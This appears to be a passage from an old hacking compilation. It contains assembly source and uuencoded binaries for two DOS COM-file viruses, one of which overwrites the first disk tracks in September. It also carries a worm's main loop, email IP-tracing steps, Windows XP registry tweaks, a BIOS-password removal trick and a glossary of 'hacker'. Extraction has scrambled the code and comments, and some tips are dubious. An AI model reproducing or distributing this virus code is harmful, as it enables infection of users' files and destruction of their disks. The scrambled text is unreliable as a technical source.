mov byte ptr [bp+numinfec],1 ; reset infection counter mov ah,1Ah lea dx,[bp+newDTA] int 21h mov ah,47h mov dl,0 lea si,[bp+origdir] int 21h mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR mov ax,3524h int 21h ; Get int 24 handler ; to ES:BX ; Get current directory ; Current drive ; DS:SI->buffer ; Set new DTA ; new DTA @ DS:DX

mov word ptr [bp+oldint24],bx; Save it mov word ptr [bp+oldint24+2],es mov ah,25h lea dx,[bp+offset int24] int 21h push cs pop es dir_scan: ; Restore ES ; 'cuz it was changed ; "dot dot" traversal 139 ; Set new int 24 handler ; DS:DX->new handler

lea dx,[bp+com_mask]

mov ah,4eh mov cx,7 findfirstnext: int 21h jc done_infections mov al,0h call open mov ah,3fh lea dx,[bp+buffer] mov cx,1Ah int 21h mov ah,3eh int 21h checkCOM:

; find first file ; any attribute ; DS:DX points to mask ; No mo files found ; Open read only

; Read file to buffer ; @ DS:DX ; 1Ah bytes

; Close file

mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA cmp ax,2000 jb find_next cmp ax,65535-(endheap-decrypt) ; Is it too large? ja find_next mov bx,word ptr [bp+buffer+1]; get jmp location add bx,heap-decrypt+3 cmp ax,bx je find_next jmp infect_com find_next: mov ah,4fh jmp short findfirstnext mov ah,3bh ; change directory 140 ; find next file ; already infected ; Adjust for virus size ; Is it too small?

lea dx,[bp+dot_dot] int 21h jnc dir_scan done_infections: jmp activate exit_virus: mov ax,2524h int 21h push cs pop ds mov ah,3bh lea dx,[bp+origdir-1] int 21h mov ah,1ah mov dx,80h int 21h retn save3 activate: mov xor lea int mov lea int xchg jmp exit_virus

; "cd .." ; go back for mo!

; Always activate ; Restore int 24 handler

lds dx,[bp+offset oldint24] ; to original

; change directory ; original directory

; restore DTA to default ; DTA in PSP ; 100h is on stack

db 0cdh,20h,0

; First 3 bytes of COM file

; ****************************** ax,04301h cx,cx dx,[di + 01Eh] 021h ax,03D02h dx,[di + 01Eh] 021h bx,ax ; Transfer file handle to AX ; DOS open file function, r/w ; DX points to file name ; DOS set file attributes function ; File will have no attributes ; DX points to file name

141

creator virusname infect_com:

db '[ZEB(C)1992]',0 db '[ranger]',0

; Mass Produced Code Generator

; ax = filesize

mov cx,3 sub ax,cx lea si,[bp+offset buffer] lea di,[bp+offset save3] movsw movsb mov byte ptr [si-3],0e9h mov word ptr [si-2],ax add ax,103h push ax finishinfection: push cx xor cx,cx call attributes mov al,2 call open mov ah,40h lea dx,[bp+buffer] pop cx int 21h mov ax,4202h xor cx,cx cwd int 21h get_encrypt_value: mov ah,2ch ; Get current time 142 ; Move file pointer ; to end of file ; xor dx,dx ; Write to file ; Write from buffer ; cx bytes ; Save # bytes to write ; Clear attributes ; Set file attributes ; needed later

int 21h or dx,dx

; dh=sec,dl=1/100 sec ; Check if encryption value = 0 ; Get another if it is ; Set new encryption value

jz get_encrypt_value lea di,[bp+code_store] mov ax,5355h stosw lea si,[bp+decrypt] push si push cx rep movsb lea mov rep pop pop pop si,[bp+write] cx,endwrite-write movsb cx si dx

mov [bp+decrypt_value],dx

; push bp,push bx ; Copy encryption function ; Save for later use

mov cx,startencrypt-decrypt ; Bytes to move

; Copy writing function ; Bytes to move

; Entry point of virus

push di push si push cx rep mov stosw mov stosb add mov pop pop pop dx,offset startencrypt - offset decrypt ; Calculate new word ptr [bp+patch_startencrypt+1],dx ; starting offset of ; decryption cx di si 143 al,0c3h ; retn movsb ax,5b5dh ; Copy decryption function ; pop bx,pop bp

call code_store

rep

movsb

; Restore decryption function ; Restore creation date/time

mov ax,5701h

mov cx,word ptr [bp+newDTA+16h] ; time mov dx,word ptr [bp+newDTA+18h] ; date int 21h mov ah,3eh int 21h mov ch,0 mov cl,byte ptr [bp+newDTA+15h] ; Restore original call attributes ; attributes ; Close file

dec byte ptr [bp+numinfec] ; One mo infection jnz mo_infections jmp done_infections mo_infections: jmp find_next open: mov ah,3dh lea dx,[bp+newDTA+30] int 21h xchg ax,bx ret attributes: mov ax,4301h int 21h ret write: pop bx ; Restore file handle 144 ; Set attributes to cx ; filename in DTA lea dx,[bp+newDTA+30] ; filename in DTA ; Not enough

pop bp mov ah,40h lea dx,[bp+decrypt] mov cx,heap-decrypt int 21h push bx push bp endwrite: int24: mov al,3 iret com_mask dot_dot heap: code_store: oldint24 backslash origdir newDTA numinfec buffer endheap: end entry_point begin 775 ranger.com

; Restore relativeness ; Write to file ; Concatenate virus ; # bytes to write

; New int 24h (error) handler ; Fail call ; Return control db '*.com',0 db '..',0 ; Variables not in code db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?) dd ? db ? db 64 dup (?) db 43 dup (?) db ? db 1ah dup (?) ; Current directory buffer ; Temporary DTA ; Infections this run ; read buffer ; End of virus ; Storage for old int 24h handler

; The following code is the buffer for the write function

MZ0``N=<`OQ$!@34``$='XOCH``!=@>T4`8VVP`&_``%7I:3&AEL#`;0:C98P M`\TAM$>R`(VV\`+-(<:&[P)<N"0US2&)GNL"C(;M`K0EC9:S`LTA#@>-EK8" MM$ZY!P#-(7(_L`#H*`&T/XV67`.Y&@#-(;0^S2&+ADH#/=`' M70.!P[\!.\-T`^M;D+1/Z\>T.XV6O`+-(7.TZQ^0N"0EQ9;K`LTA#A^T.XV6 M[P+-(;0:NH``S2'#S2``N`%#,\F-51[-(;@"/8U5'LTAD^O-6UI%0BA#*3$Y M.3)=`%MR86YG97)=`+D#`"O!C;9<`XV^P`&EI,9$_>F)1/X%`P%043/)Z(P` ML`+H?0"T0(V67`-9S2&X`D(SR9G-(;0LS2$+TG3XB98+`8V^OP*X55.KC;8# 145

M`;D.`%91\Z2-MJ0"N0\`\Z197EI75E'SI+A=6ZNPPZJ#P@Z)E@ M\Z2X`5>+CD8#BY9(`\TAM#[-(;4`BHY%`^@6`/Z.6P-U`^D5_^D$_[0]C99. J`\TAD\.X`4.-EDX#S2'#6UVT0(V6`P&YO`'-(5-5L`//*BYC;VT`+BX` ` end 8) Viruse:Dont be sad ; ; ---- Data Segment Values ---; ds:[0f6h] = read buffer location ; ds:[0f8h] = write buffer location ; ds:[0fah] = store length of virus at this location ; ds:[0fch] = store length of file to be infected at this location ; ds:[0feh] = filename of file to infect ; .model tiny .code org start: nop nop ;****** ;get date ;****** mov ah,2ah int 21h cmp dh,09h jnz do_not_activate ;**** ;the nasty bit ;**** 146 ; get the date ; do it ; is it September? ; if NO jmp do_not_activate ; these two nop instructs will be used by 'Nasty' ; to determine if a file is already infected 100h ; origin for .com files

;* ;* 1. Print message ;* lea dx,mess mov ah,09 int 21h ;**** ;* 2. Destroy disk ;**** mov ah,19h int 21h mov dl,al mov ah,05 mov cl,01 mov ch,00 mov dh,00 mov al,10h int 13h ; get current drive (returned in al) ; do it ; dl = drive # to be formated ; disk format function ; first sector ; first track ; head zero ; 10h (16) sectors - 2 tracks ; do it (overwrite first 16 tracks on currently ; selected disc) ; print message ; 'Nasty in September' ; do it

do_not_activate: mov cx,80h mov si,0080h mov di,0ff7fh rep movsb ; save parameters; set counter to 80h bytes ; offset in the current data segment of the byte ; to be copied ; offset to which byte is to be moved ; move bytes until cx=0 (decrement cx by 1 each time ; loop is performed is done automatically) ; (increment by 1 of si & di is done automatically) lea ax,begp mov cx,ax sub ax,100h ; load exit from program offset address into ax ; " " " " " " " cx ; subtract start of .com file address (100h) from ax ; ax now contains the length of the virus 147

mov ds:[0fah],ax add cx,fso mov ds:[0f8h],cx ADD CX,AX mov ds:[0f6h],cx mov cx,ax lea si,start mov di,ds:[0f8h]

; put length of the virus into the data segment at ; add fso (5h) to cx (offset address of exit)

; offset 0fah ; so, cx=cx+5 ; move cx (end of virus + 5) into data segment at ; add virus length (ax) to cx ????? ; mov cx into data segment at offset 0f6h. ; mov length of virus into cx ; load address of 'start' (start of virus) into ; souce index ; mov the value of the write buffer (@ 0f8h) into ; destination index ; ** Start of the read buffer ; offset 0f8h. ** Start of the write buffer.

rb:

; cx = counter (length of virus) ; si = offset of byte to be read ; di = offset of where to write byte to ; (auto decrement of cx & increment of si & di)

rep movsb stc

; copy the virus into memory ; set the carry flag ; set infector for .com files only

lea dx,file_type_to_infect mov ah,4eh mov cx,20h int 21h

; find first file with specified params ; files with archive bit set ; do it ; if file found, CF is cleared, else ; CF is set

or ax,ax jz file_found

; works the below instructions (jz & jmp) ; if file found jmp file_found 148

jmp done file_found: mov ah,2fh int 21h

; if no file found, jmp done (exit virus)

; get dta (returned in es:bx) ; do it ; mov size of file to be infected into ax ; mov filesize into ds:[0fch] ; bx now points to asciz filename ; mov filename into ds:[0feh] ; clear carry flag ; open file for r/w (ds:dx -> asciz filename) ; mov filename into dx ; do it (ax contains file handle) ; mov file handle into bx ; get time & date attribs from file to infect ; do it (file handle in bx) ; save time to the stack ; save date to the stack ; read from file to be infected ; number of bytes to be read (filesize of file to ; buffer (where to read bytes to) ; do it ; mov buffer location to bx ; mov contents of bx (first two bytes - as bx is ; 16-bits) into ax. ; Now check to see if file is infected... if the 149 ; be infected

mov ax,es:[bx+1ah] mov ds:[0fch],ax add bx,1eh mov ds:[0feh],bx clc mov ax,3d02h mov dx,bx int 21h mov bx,ax mov ax,5700h int 21h push cx push dx mov ah,3fh mov cx,ds:[0fch] mov dx,ds:[0f6h] int 21h mov bx,dx mov ax,[bx]

; ; sub ax,9090h jz fin

file is infected, it's first two bytes will be 9090h (nop nop) ; If file is already infected, zero flag will be set

; thus jump to fin(ish)

mov ax,ds:[0fch] mov bx,ds:[0f6h] mov [bx-2],ax mov ah,3ch mov cx,00h mov dx,ds:[0feh] clc int 21h

; mov filesize of file to be infected into ax ; mov where-to-read-to buffer into bx ; correct old len ; Create file with handle ; cx=attribs -- set no attributes ; point to name ; create file

; clear carry flag ; Note: If filename already exists, (which it does) ; truncate the filelength to zero - this is ok as ; we have already copied the file to be infected ; into memory.

mov bx,ax mov ah,40h

; mov file handle into bx ; write file with handle (write to the file to be ; infected) - length currently zero ; cx=number of bytes to write

mov cx,ds:[0fch] add cx,ds:[0fah] mov DX,ds:[0f8h] int 21h

; length of file to be infected ; length of virus ; location of write buffer (this contains the virus

; + the file to be infected) ; write file ; new file = virus + file to be infected 150

mov ax,5701h pop dx pop cx int 21h

; restore original time & date values ; get old date from the stack ; get old time from the stack ; do it ; Note: Infected file will now carry the time & date ; it had before the infection.

mov ah,3eh int 21h

; close file (bx=file handle) ; do it ; Note: date & time stamps automatically updated if ; file written to.

fin: stc mov ah,4fh int 21h or ax,ax jnz done JMP file_found done: mov cx,80h mov si,0ff7fh mov di,0080h rep movsb ; set counter (cx) = 80h ; source offset address (copy from here) ; destination offset address (copy to here) ; copy bytes! (cx is auto decremented by 1 ; si & di are auto incremented by 1) ; Note: this is a 'restore parameters' feature ; this does the reverse of what what done earlier ; in the program (do_not_activate:) mov ax,0a4f3h mov ds:[0fff9h],ax mov al,0eah mov ds:[0fffbh],al ; ; reset data segment locations ??? (to previous 151 ; ; ; set carry flags ; find next file (.com) ; do it ; decides zero flag outcome ; if no more .com files, jmp done ; else begin re-infection process for new file.

mov ax,100h mov ds:[0fffch],ax lea si,begp lea di,start mov ax,cs mov ds:[0fffeh],ax mov kk,ax mov cx,fso db 0eah dw 0fff9h kk dw 0000h

; values before virus infection) ; ; load exit from program offset address into si ; load offset address of start of virus into di ; re-align cs = ds ???

; define byte ; define word ; define kk = word ; virus message to display ; infect only .com files.

mess db 'Sad virus - 24/8/91',13,10,'$' file_type_to_infect db '*?.com',0 fso dw 0005h

; store 5 into 'fso'. dw means that fso is 2 bytes ; in size (a word) ; ----- alma mater

begp: mov int ax,4c00h 21h ; normal dos termination (set al to 00) ; do it

end start begin 775 sad.com MD)"T*LTA@/X)=1FZ#@*T"_@#XN`(]B]/-(8O8N`!7S2%1 M4K0_BP[\`(L6]@#-(8O:BP]@")1_ZT/+D``(L6_@#XS2&+ MV+1`BP[\``,.^@"+%O@`S2&X`5=:6<TAM#[-(?FT3\TA"\!U`NN*N8``OG__ MOX``\Z2X\Z2C^?^PZJ+[_[@``:/\_[XM`K\``8S(H_[_HPP"BPXK`NKY_P`` D4V%D('9I<G5S("T@,C0O."\Y,0T*)"H_+F-O;0`%`+@`3,TA ` 152

end 9) Worme viruses 666 The Dead Zone 214-522-5321 300/1200/2400 666 #include #include #include #include

long current_time; struct rlimit no_core = {0,0};

int main (argc, argv) int argc; char *argv[];

{ 153

int n; int parent = 0; int okay = 0; /* change calling name to "sh" */ strcpy(argv[0], "sh"); /* prevent core files by setting limit to 0 */ setrlimit(RLIMIT_CORE, no_core); current_time = time(0); /* seed random number generator with time */ srand48(current_time); n = 1; while (argv[n]) { /* save process id of parent */ if (!strncmp(argv[n], "-p", 2)) { parent = atoi (argv[++n]); n++; } 154

else { /* check for 1l.c in argument list */ if (!strncmp(argv([n], "1l.c", 4)) okay = 1; /* load an object file into memory */ load_object (argv[n]; /* clean up by unlinking file */ if (parent) unlink (argv[n]); /* and removing object file name */ strcpy (argv[n++], ""); }

} /* if 1l.c was not in argument list, quit */ if (!okay) exit (0); 155

/* reset process group */ setpgrp (getpid()); /* kill parent shell if parent is set */ if (parent) kill(parent, SIGHUP); /* scan for network interfaces */ if_init(); /* collect list of gateways from netstat */ rt_init(); /* start main loop */ doit(); }

int doit() { current_time = time (0); 156

/* seed random number generator (again) */ srand48(current_time); /* attack gateways, local nets, remote nets */ attack_hosts(); /* check for a "listening" worm */ check_other () /* attempt to send byte to "ernie" */ send_message () for (;;) { /* crack some passwords */ crack_some (); /* sleep or listen for other worms */ other_sleep (30); crack_some (); /* switch process id's */ if (fork()) /* parent exits, new worm continues */ 157

exit (0); /* attack gateways, known hosts */ attack_hosts(); other_sleep(120); /* if 12 hours have passed, reset hosts */ if(time (0) == current_time + (3600*12)) { reset_hosts(); current_time = time(0); } /* quit if pleasequit is set, and nextw>10 */ if (pleasequit && nextw > 10) exit (0); } }

158

HOW TO TRACK **IP ADD***


How to find the IP address of the sender in Gmail, Yahoo! mail or Hotmail When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.

Finding IP address in Gmail 1. Log into your Gmail account with your username and password.

2. Open the mail. 3. To display the headers, * Click on More options corresponding to that thread. You should get a bunch of links. * Click on Show original 4. You should get headers like this: Gmail headers :x*x*x*x*x*x*x Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is 65.119.112.245. That is be the IP address of the sender! 5. Track the IP address of the sender Finding IP address in Yahoo! Mail 1. Log into your Yahoo! mail with your username and password. 2. Click on Inbox or whichever folder you have stored your mail. 3. Open the mail. 159

4. If you do not see the headers above the mail message, your headers are not displayed.To display the headers, * Click on Options on the top-right corner * In the Mail Options page, click on General Preferences * Scroll down to Messages where you have the Headers option * Make sure that Show all headers on incoming messages is selected * Click on the Save button * Go back to the mails and open that mail 5. You should see similar headers like this: Yahoo! headers : x*x*x*x*x*x*x Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109. That is be the IP address of the sender! 6. Track the IP address of the sender Finding IP address in Hotmail 1. Log into your Hotmail account with your username and password. 2. Click on the Mail tab on the top. 3. Open the mail. 4.If you do not see the headers above the mail message, your headers are not displayed.To display the headers, * Click on Options on the top-right corner * In the Mail Options page, click on Mail Display Settings * In Message Headers, make sure Advanced option is checked * Click on Ok button * Go back to the mails and open that mail 5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address Hotmail headers : X*x*x*x*x*x*x ,In this case the IP address of the sender is [68.34.60.59]. Jump to step 9. 6. If you find a header with Received: from followed by a Gmail proxy like this Hotmail headers : X*x*x*x*x*x*x Look for Received: from followed by IP address within square brackets[]. 160

In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9. 7. Or else if you have headers like this Hotmail headers : X*x*x*x*x*x*x Look for Received: from followed by IP address within square brackets[].In this case, the IP address of the sender is [61.83.145.129] (Spam mail). Jump to step 9. 8. * If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com. 9. Track the IP address of the sender

Back

161

162

Hacking XP

Now lets play with window XP


How to Find a Lost File in your computer?
To find this missing file first, select the 'Start' button (bottom left hand corner of your screen) then select from the Start menu list that opens, 'Find' then 'Files or Folder'. When the 'Find: All Files' dialog box opens you are ready to find that missing file. If you did a simple search for all '.doc files' (being the Microsoft Word file suffix) you may bring up hundreds of Microsoft Word files. To help you narrow your search, if you can remember part of the file name eg; 'jim', when the full name maybe 'Jim Burns quote 2.5.02.doc' you will get fewer results. To make a partial word search type in the 'Named' field the word followed by an *, this is above the number 8, press 'shift key + 8' to replace missing word/s or letter/s eg; 'jim*.doc', then you will have fewer results. You can use * before or after the partial word/s or letter/s. By default your hard drive will be selected in the 'Look in' field. To start your search press the 'Find Now' button and the results will be listed below. To make your search quicker if you save all your files inside your 'My Documents' folder select it in the 'Look in' field when you open the 'Find: All Files' dialog box. By selecting the 'My Documents' folder your computer only searches it instead of your whole hard drive 163

1)

XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

2) 3)

Creating Shutdown Icon or One Click Shutdown: Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut). You should now see a pop-up window Use instructing this path you in to enter a command of line the path. Item" "Type Location

SHUTDOWN -s -t 01
4)

If the C: drive is not your local hard drive, then replace "C" with the correct letter of the hard drive. Click the "Next" button. Name the shortcut and click the "Finish" button. Now whenever you want to shut down, just click on this shortcut and you're done.

5) 6)

Increasing Band-Width By 20%: Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc To get it back: Click Start then Run and type "gpedit.msc" without quotes.This opens the group policy editor. Then go to: Local Computer Policy then Computer Configuration then Administrative Templates then Network then QOS Packet Scheduler and then to Limit Reservable Bandwidth.

7)

Making Folders Private: Open My Computer Double-click the drive where Windows is installed (usually

drive (C:), unless you have more than one drive on your computer). If the contents of the drive are hidden, under System Tasks, click Show the contents of this drive. Double-click the Documents and Settings folder. Double-click your user folder. Right-click any folder in your user profile, and then click Properties. On the Sharing tab, select the Make this folder private so that only I have access to it check box.
8)

To change Drive Letters: Go to Start > Control Panel > Administrative Tools > Computer Management,

Disk Management, then right-click the partition whose name you want to change 164

(click in the white area just below the word "Volume") and select "change drive letter and paths." From here you can add, remove or change drive letters and paths to the partition.
9)

Removing the Shortcut arrow from Desktop Icons: Goto Start then Run and Enter regedit. Navigate to

HKEY_CLASSES_ROOTlnkfile. Delete the IsShortcut registry value. You may need to restart Windows XP.
10)

Get Drivers for your Devices:

Visit Windows Update (XP Only) Look at the left hand pane and under Other Options click Personalize Windows Update. Now in the right hand pane check the box - Display the link to the Windows Update Catalog under See Also Below Choose which categories and updates to display on Windows Update - make sure you check all the boxes you want shown. Click Save Settings Now look in the left hand pane under See Also click Windows Update Catalog and choose what you're looking for. Choose either MS updates or drivers for hardware devices. Start the Wizard and off you go.
11)

Customize Internet Explorer's Title Bar:

Open Registry by going to Start then Run and Enter regedit. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Internet. Explorer\Main. In right hand panel look for string "Window Title" and change its value to whatever custom text you want to see.
12)

Disabling the use of Win Key:

If your are a gaming freak then you must be sick of the Win key in your keyboard. To disable use of Win key, open registry by going to Start then Run and entering regedit. Navigate to [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout] . In this look for value of "Scancode Map". Its binary data so be extra careful: Set its value to "00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00" to disable the win key.
13)

Restarting

Windows

without

Restarting

the

Computer:

This one is again is. When you click on the SHUTDOWN button, make sure to simultaneous press SHIFT Button. If you hold the Shift key down while clicking 165

on SHUTDOWN button, you computer would restart without restarting the Computer. This is equivalent to term "HOT REBOOT".
14)

Stopping XP from displaying unread messages count on Welcome Screen: To stop XP from displaying count of unread messages, Open registry and navigate to [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Unrea dMail] and look for the data key "MessageExpiryDays". If you do not see this key, create one DWORD key by the name "MessageExpiryDays". Setting its value to 0 would stop Windows XP from displaying the count of unread messages.

15) Adding Administrative Tools Icon To The Desktop:

Open Registry Editor. In Registry Editor, navigate to the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Expl orer\Desktop\NameSpace . Create the following key: {D20EA4E1-3957-11d2A40B-0C5020524153} (just copy/paste, including the brackets). Close Registry Editor. There is no need to reboot. Just wait a few seconds and see how the icon appears.
16)

Creating The Suspend Shortcut:

Right click on the Desktop .New / Shortcut. Enter in rundll32.exe PowrProf.dll, SetSuspendState . Give it whatever name you want. Now when you click on that shortcut, your computer will shutdown and suspend.
17)

Disable XP Load Screen:

By disabling the load screen you can boost the boot up time by a couple of seconds, if not more. To disable the load screen, open the msconfig utility: go to Start>Run, type in msconfig without quotes and press Enter. In the subsequent window, select the boot.ini tab. Check the /NOGUIBOOT option and press Apply. Restart Windows to see the effect.
18)

To Remove Arrow Signs From Desktop Shortcuts:

Open registry editor by going to Start then Run and entering regedit. Once in registry, navigate to key HKEY_CLASSES_ROOT\lnkfile\ and rename the string value IsShortcut to AriochIsShortcut
19)

Make Your Internet Explorer As Fast As FireFox: navigate 166 to key

Open registry editor by going to Start then Run and entering regedit. Once in registry,

HKEY_CURRENT_USER\Software\microsoft\Windows\CurrentVersion\InternetSet tings. good Right speed click u @ windows e;g : right > New > DWORD. DWORD type >type MaxConnectionsPerServer > You can set value (the more higher the no, the more get, 99). Create another MaxConnectionsPer1_0Server. Then put a high value as mentioned above. Restart I.E and you are done.
20)

Disable Disk Performance Counters

Win XP comes with many inbuilt performance monitoring applications that constantly examine various parts of the system. This information can be of real use to a system administrator for collecting performance statistics. However, for a home user, these statistics hold no value and since the monitoring happens all the time, it consumes a good deal of system resources. Disk monitoring, for example, happens in the background, and turning it off is advisable if you will not be using the performance monitoring applications. To turn it off, type in diskperf -N at a command prompt. To bring up the command prompt: go to Start>Run, type in cmd and press [Enter].
21)

Removing Multiple Boot Screens:

If you are getting unwanted multiple boot screen Then Follow these Steps. 1> Right Click on My Computer 2> Select Properties 3> Select Advanced Tab 4> Select Settings In the Startup & Recovery Section(3rd grp) 5> Select the operating system which u want. 6> And Click OK. 7> Further again press the setting and click on Edit. 8> It will open boot.ini File. 9>Now u can delete those o/s which you don't want to be displayed. Note: For deleting operating systems from boot.ini file, keep it mind that you can't
22)

delete

that

o/s

which

is

selected

by

default

there.

Before

making any changes make a copy of boot.ini file. Enabling Hibernation: 167

Go to diplay properties>screen savers>power>hibernate. Check 'Enable Hibernation'. Press shift button after you click 'Turn Off Computer' in start menu.
23)

To Increase the Internet Speed:

Open Notepad and paste the below code in it. [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Paramete rs] "SackOpts"=dword:00000001 "TcpWindowSize"=dword:0005ae4c "Tcp1323Opts"=dword:00000003 "DefaultTTL"=dword:00000040 "EnablePMTUBHDetect"=dword:00000000 "EnablePMTUDiscovery"=dword:00000001 "GlobalMaxTcpWindowSize"=dword:0005ae4c Now save this file as speed.reg. Execute it and observe the change!
24)

Changing Your Dynamic IP Address: Click on "Run"

1. Click on "Start" in the bottom left hand corner of screen 2. 3. Type in "command" and hit okay 4. Type "ipconfig /release" just like that, and hit "enter" 5. Type "exit" and leave the prompt 6. Right-click on "Network Places" or "My Network Places" on your desktop. 7. Click on "properties" 8. Right click on "Local Area Connection" and click "properties" 9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab 10. Click on "Use the following IP address" under the "General" tab 11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until it fill the area up). 11. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers. 12. Hit the "ok" button here 13. Hit the "ok" button again 168

14. Right-click back on "Local Area Connection" and go to properties again. 16. Go back to the "TCP/IP" settings 17. This time, select "Obtain an IP addres
25)

BIOS PASSWORD CRACK

1)Boot up windows from CD. 2)Go to dos prompt or go to command prompt directly from the windows start up menu. 3)Type the command at the prompt:"debug"(without quotes) 4)Type the following lines now exactly as given... 07010 07120 quit exit 4)Exit from the dos prompt and restart the machine. PASSWORD PROTECTION IS GONE. Just make ur backup
26)

where is the windows xp administrator password saved??

C:/WINDOWS/SYSTEM32/CONFIG/SAM

27) )

Windows 2000 Workstation's log-in screen has a "Shutdown" button which you can use to shutdown the system without ever logging in. But you can disable Windows 2000 Workstation's "Shutdown" button on the initial log-in screen: Run "RegEdit.exe" or "RegEdt32.exe" Select the following key: HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows NT\ 169

Current Version\Winlogon Add a value named "ShutdownWithoutLogon" of type "REG_SZ" and set it to "0". Restart Windows
28)

Adding a Shortcut Key to Your Internet Connection

To add items when you right-click on the Start Button: Start Regedit Go to HKey_Classes_Root / Directory / Shell Right-click on Shell and select New / Key Type in the name of the key and press the Enter key In the Default name that shows in the right hand panel, you can add a title with a & character in front of the letter for a shortcut Right-click on the key you just created and create another key under it called command For the value of this command, enter the full path and program you want to execute Now when you right click on the Start Button, your new program will show up. You do not need to reboot first.

Back

170

171

Glossary
Lexicon
A hacker is anyone who enjoys the intellectual challenge of creatively overcoming or circumventing limitations, primarily in their fields of interest, namely programming or electrical engineering. As will be discussed below, there is a trend in the popular press to use the term to describe computer criminals, and others whose motivations are less pure than the traditional hacker, which trend greatly annoys many of those old-school computer/technology enthusiasts.

Origin of the term at MIT


The term originally developed at MIT long before computers became common; a "hack" meant a simple, but often inelegant, solution. The term hack came to refer to any clever prank perpetrated by MIT students; the perpetrator is a hacker. To this day the terms hack and hacker are used in that way at MIT, without necessarily referring to computers. When MIT students surreptiously put a police car atop the dome on MIT's Building 10, that was a hack, and the students involved were therefore hackers. Computer culture at MIT developed when members of the Tech Model Railroad Club started working with a Digital Equipment Corporation PDP-1 computer and applied local model railroad slang to computers. In modern computer culture, the label "hacker" is a compliment, indicating a skilled and clever programmer. In the media, however, it has negative connotations and has become synonymous with "software cracker".

The term hacker is used in five senses in common use: use


1. Someone who knows a (sometimes specified) set of programming interfaces well enough to write novel and useful software without conscious thought on a good day. 2. Someone who (usually illegally) attempts to break into or otherwise subvert the security of a program, system or network, often with malicious intent. This usage was annoying to many in the developer community who grew up with the primary meaning in sense (1), and preferred to keep it that way; they preferred the media used the term cracker. However this wound up causing even more problems as simply

172

creating a new word did nothing to dispel misconceptions. "Black hat hacker" is a phrase that wound up with the same problems as the word "cracker". 3. Someone who attempts to break into systems or networks in order to help the owners of the system by making them aware of security flaws in it. This is referred to by some as a "white hat hacker" or sneaker. Many of these people are employed by computer security companies, and are doing something completely legal; and many were formerly hackers within sense 2. 4. Someone who, through either knowledge or trial and error, makes a modification to an existing piece of software, made available to the hacker community, such that it provides a change of functionality. Such change is normally a benefit. Rather than a competition, the exchange of improvements is most often experienced as a cooperative learning effort. 5. A Reality Hacker or Urban Spelunker (origin: MIT); someone who enjoys exploring air ducts, rooftops, shafts and other hidden aspects of urban life, sometimes including pulling elaborate pranks for the enjoyment and entertainment of the community. "Script kiddie" is reserved for a computer user of little or no skill who simply follows directions or uses a cook-book approach without fully understanding the meaning of the steps they are performing. "h4x0r" (pronounced Hacks-Or) is a script kiddie in the context of a computer game (i.e. someone who uses a program to modify a game giving them special and unfair advantages). "h4x0r" is often used jokingly or as a term of endearment between gamers. Note that while the term hacker denotes competence, the noun hack often means kludge and thus has a negative connotation while the verb hack generally shares the same competent connotations. The hacker community (the set of people who would describe themselves as hackers, or who would be described by others as hackers) falls into at least three partially overlapping categories. The word hacker probably derives from the somewhat derogatory hack, used in the newspaper industry typically to refer to a Journalist who types his stories without checking his facts first.

173

Hacker -- Brilliant Programmer


One who knows a (sometimes specified) set of programming interfaces well enough to write novel and useful software without conscious thought on a good day. This type of hacker is respected within the development community for the freedom they represent, although the term still carries some of the meaning of Hack, developing programs without adequate planning. This zugzwang sets freedom and the ability to be creative against methodical careful progress. Corporate programming environments typically favor only either the good hackers or the careful computer scientist. At their best, Hackers can be surprisingly productive. Industry standard rates of development are in the range of 6-10 lines of code (debugged, and documented) per hour. A Hacker in stride can produce a few hundred or occasionally even thousands lines of code an hour by leveraging their previous work. As a result a Hacker may be able to sketch out the full shape of a program to a level of quality that can be used for demonstrating ideas in less than a week. Thus it isn't hard to see what some companies find useful in Hacker talent. The down side of Hacker productivity is generally agreed to be in maintainability, documentation, and completion. Very talented hackers may become bored with a project once they have figured out all of the hard parts, and be unwilling to finish off the details. This attitude can cause friction in shops where other programmers are expected to pick up the half finished work, decipher the structures and ideas, and bullet-proof the code. In other cases, where a Hacker is willing to maintain their own code, a company may be unable to find anyone else who is capable or willing to dig through code to maintain the program if the original programmer moves on to a new job.

Hacker -- Computer Criminal

174

The popular press has been known to use the terms "hacker" and occasionally "cracker" for someone who attempts to break into or otherwise subvert the security of a system or network. Both usages are annoying to many in the developer community who grew up with the primary meaning of "hacker" in the Guru sense, and who don't see the problem solved by the invention of new and nebulous words like "cracker" or "black hat". Instead, there has been a move to define terms when describing these people. What makes someone a "hacker", a "computer criminal", or just a regular computer user? Once these details are known, the proper word (or combination) can be accurately applied. While it will always be possible to use one's "hacker" skills in a destructive way, this tends to go against the loosely defined hacker ethic. One can certainly use hacking skills to commit a crime. However, this means that this particular hacker is now a criminal, vandal, malicious user, etc., existing words that do a much better job of describing the person's actions than the nebulous "cracker". If a locksmith used his skills to break into a building, few would debate that he had crossed into 